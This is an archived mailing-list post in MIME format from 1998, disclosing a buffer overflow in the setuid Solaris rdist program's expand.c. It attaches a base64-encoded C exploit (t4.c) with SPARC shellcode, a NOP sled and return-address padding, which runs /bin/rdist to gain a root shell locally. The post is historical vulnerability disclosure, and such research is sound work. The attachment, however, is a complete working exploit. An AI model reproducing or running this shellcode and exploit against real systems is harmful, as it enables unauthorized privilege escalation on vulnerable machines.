This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --0-361180480-902967603=:2007 Content-Type: TEXT/PLAIN; charset=US-ASCII Enclosed is an exploit for a hole in Solaris rdist that I believe the patch #105667-01 addresses. That patch is for 2.6. I've personally tested the exploit on 2.6, 2.5.1, and 2.5 machines. I'm not sure if that is the right patch, but I'm pretty sure this hole has been fixed. You can see the hole if you look at the bsd source for rdist, which is apparantly pretty similiar to the code Sun used. The vulnerability is in expand.c, which you can look at here: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c?rev=1.5 Part of the program's functionality is to allow a user to define variables and reference them in a way similiar to environment variables. The problem comes in when the program attempts to substitute the symbol representing the variable with it's value. You should be able to see this by doing: rdist -d bleh=AAAAA(lotsa lotsa A's) -c /tmp/ '${bleh}' In the function expstr(), we have if (tp != NULL) { for (; tp != NULL; tp = tp->n_next) { (void) sprintf((char *)ebuf, "%s%s%s", s, tp->n_name, tail); expstr(ebuf); } return; } A little higher in the code, we see: u_char ebuf[BUFSIZ]; This is obviously a bad thing. BTW, none of the bsds or linuxs are vulnerable to any rdist hole to the best of my knowledge because the binary isn't suid. My nick used to be humble, but as of reading bugtraq yesterday, I can see that someone else is partial to the name. In order to allieviate confusion, (and to possibly deflect emails about how to "run ufsrestore.c" to him :p), I'll change my nick. And looking at this last post, I don't think I want to inherit his enemies. :> horizon --0-361180480-902967603=:2007 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="t4.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.OSF.3.91.980812202003.2007Cat_private> Content-Description: LyogcmRpc3Qgc29sYXJpcyAyLiogc3Bsb2l0ICovDQovKiBieSBob3Jpem9u LiB0aGFua3MgdG8ga3R3byAqLw0KLyogYXJndlsxXSBpcyB5b3VyIG9mZnNl dCAqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIu aD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDx1bmlzdGQu aD4NCg0KI2RlZmluZSBCVUZfTEVOR1RIIDEwMjQgDQojZGVmaW5lIFNBRkVU WSA0MCAvKiBibGluZCBndWVzcyAqLw0KI2RlZmluZSBFWFRSQSA0MDANCiNk ZWZpbmUgU1RBQ0tfT0ZGU0VUIDIzNjANCiNkZWZpbmUgU0FGRVRZX09GRlNF VCAyNDgNCiNkZWZpbmUgU1BBUkNfTk9QIDB4YWMxNWExNmUNCg0KdV9jaGFy IHNwYXJjX3NoZWxsY29kZVtdID0NCiJceDkwXHgwOFx4M2ZceGZmXHg4Mlx4 MTBceDIwXHg4ZFx4OTFceGQwXHgyMFx4MDgiDQoiXHg5MFx4MDhceDNmXHhm Zlx4ODJceDEwXHgyMFx4MTdceDkxXHhkMFx4MjBceDA4Ig0KIlx4MmRceDBi XHhkOFx4OWFceGFjXHgxNVx4YTFceDZlXHgyZlx4MGJceGRhXHhkY1x4YWVc eDE1XHhlM1x4NjgiDQoiXHg5MFx4MGJceDgwXHgwZVx4OTJceDAzXHhhMFx4 MGNceDk0XHgxYVx4ODBceDBhXHg5Y1x4MDNceGEwXHgxNCINCiJceGVjXHgz Ylx4YmZceGVjXHhjMFx4MjNceGJmXHhmNFx4ZGNceDIzXHhiZlx4ZjhceGMw XHgyM1x4YmZceGZjIg0KIlx4ODJceDEwXHgyMFx4M2JceDkxXHhkMFx4MjBc eDA4XHg5MFx4MWJceGMwXHgwZlx4ODJceDEwXHgyMFx4MDEiDQoiXHg5MVx4 ZDBceDIwXHgwOCI7DQoNCmludCBhZGRyX29rKGxvbmcgYSkNCnsNCglpZiAo KChhPj4yNCkmMjU1KT09MCkgcmV0dXJuIDA7DQoJaWYgKCgoYT4+MTYpJjI1 NSk9PTApIHJldHVybiAwOw0KCWlmICgoKGE+PjgpJjI1NSk9PTApIHJldHVy biAwOw0KCWlmICgoKGEpJjI1NSk9PTApIHJldHVybiAwOw0KCXJldHVybiAx Ow0KfQ0KDQp1X2xvbmcgZ2V0X3NhZmVfYWRkcihsb25nIHNwKQ0Kew0KICAg cmV0dXJuIHNwLVNBRkVUWV9PRkZTRVQ7DQp9DQoNCnVfbG9uZyBnZXRfc3Ao dm9pZCkNCnsNCiAgIF9fYXNtX18oIm1vdiAlc3AsJWkwIFxuIik7DQp9DQoN CmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogICBjaGFy IGJ1ZltCVUZfTEVOR1RIICsgRVhUUkEgKyA4XTsNCiAgIGNoYXIgdGVtcGJ1 ZltCVUZfTEVOR1RIICsgRVhUUkEgKyA4KzZdOw0KDQogICBsb25nIHN0YWNr LHRhcmdfYWRkcixzYWZlX2FkZHI7DQoNCiAgIHVfbG9uZyAqbG9uZ19wOw0K ICAgdV9jaGFyICpjaGFyX3A7DQogICBpbnQgaSwgY29kZV9sZW5ndGggPSBz dHJsZW4oc3BhcmNfc2hlbGxjb2RlKSxkc289MDsNCg0KICAgaWYoYXJnYyA+ IDEpIGRzbz1hdG9pKGFyZ3ZbMV0pOw0KDQogICBzdGFjaz1nZXRfc3AoKTsN Cg0KICAgc2FmZV9hZGRyPWdldF9zYWZlX2FkZHIoc3RhY2spOw0KICAgd2hp bGUoYWRkcl9vayhzYWZlX2FkZHIpPT0wKSBzYWZlX2FkZHIrPTg7DQoNCiAg IHRhcmdfYWRkciA9IHN0YWNrICsgU1RBQ0tfT0ZGU0VUIC0gZHNvOw0KICAg d2hpbGUoYWRkcl9vayh0YXJnX2FkZHIpPT0wKSB0YXJnX2FkZHIrPTg7DQoN CiAgIGxvbmdfcCA9KHVfbG9uZyAqKSBidWYgOw0KICAgZm9yIChpID0gMDsg aSA8IChCVUZfTEVOR1RIIC0gY29kZV9sZW5ndGgpIC8gc2l6ZW9mKHVfbG9u Zyk7IGkrKykNCiAgICAgICpsb25nX3ArKyA9IFNQQVJDX05PUDsNCg0KICAg Y2hhcl9wID0gKHVfY2hhciAqKSBsb25nX3A7DQoNCiAgIGZvciAoaSA9IDA7 IGkgPCBjb2RlX2xlbmd0aDsgaSsrKQ0KICAgICAgKmNoYXJfcCsrID0gc3Bh cmNfc2hlbGxjb2RlW2ldOw0KDQogICAqY2hhcl9wKys9JyAnOw0KICAgKmNo YXJfcCsrPScgJzsNCgkNCiAgIGZvciAoaSA9IDA7IGkgPCBTQUZFVFkgLzQ7 IGkrKykNCiAgIHsNCiAgICAgICpjaGFyX3ArKyA9KHNhZmVfYWRkcj4+MjQp JjI1NTsNCiAgICAgICpjaGFyX3ArKyA9KHNhZmVfYWRkcj4+MTYpJjI1NTsN CiAgICAgICpjaGFyX3ArKyA9KHNhZmVfYWRkcj4+OCkmMjU1Ow0KICAgICAg KmNoYXJfcCsrID0oc2FmZV9hZGRyKSYyNTU7DQogICAgfQ0KDQogICBmb3Ig KGkgPSAwOyBpIDwgKEVYVFJBLVNBRkVUWSkgLzQ7IGkrKykNCiAgIHsNCiAg ICAgICpjaGFyX3ArKyA9KHRhcmdfYWRkcj4+MjQpJjI1NTsNCiAgICAgICpj aGFyX3ArKyA9KHRhcmdfYWRkcj4+MTYpJjI1NTsNCiAgICAgICpjaGFyX3Ar KyA9KHRhcmdfYWRkcj4+OCkmMjU1Ow0KICAgICAgKmNoYXJfcCsrID0odGFy Z19hZGRyKSYyNTU7DQogICB9DQoNCiAgICpjaGFyX3ArKz0wOw0KDQogICBz cHJpbnRmKHRlbXBidWYsImJsZWg9JXMiLCZidWZbMl0pOw0KDQogICBwcmlu dGYoIlN0YWNrIGFkZHJlc3M6IDB4JWx4LiBTYWZlIGFkZHJlc3M6IDB4JWx4 IChkZWx0YSAlZCkuXG4iLA0KICAgICAgc3RhY2ssc2FmZV9hZGRyLHN0YWNr LXNhZmVfYWRkcik7DQogICBwcmludGYoIkp1bXBpbmcgdG8gYWRkcmVzcyAw eCVseCBCWyVkXSBFWyVkXSBTT1slZF1cbiIsDQogICAgICB0YXJnX2FkZHIs QlVGX0xFTkdUSCxFWFRSQSxTVEFDS19PRkZTRVQpOw0KICAgZXhlY2woIi9i aW4vcmRpc3QiLCJyZGlzdCIsIi1kIix0ZW1wYnVmLCItYyIsIi90bXAvIiwi JHtibGVofSIsKGNoYXIgKikgMCk7DQogICBwZXJyb3IoImV4ZWNsIGZhaWxl ZCIpOw0KfQ0K --0-361180480-902967603=:2007--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:12:27 PDT